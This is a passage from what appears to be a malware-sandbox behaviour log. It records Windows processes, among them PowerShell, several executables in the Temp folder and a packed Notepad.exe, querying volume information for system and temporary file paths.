Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Users\user\AppData\Local\Temp\mergedALL.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fix.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fix.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI70442 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Queries volume information: C:\Users\user\activate.bat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
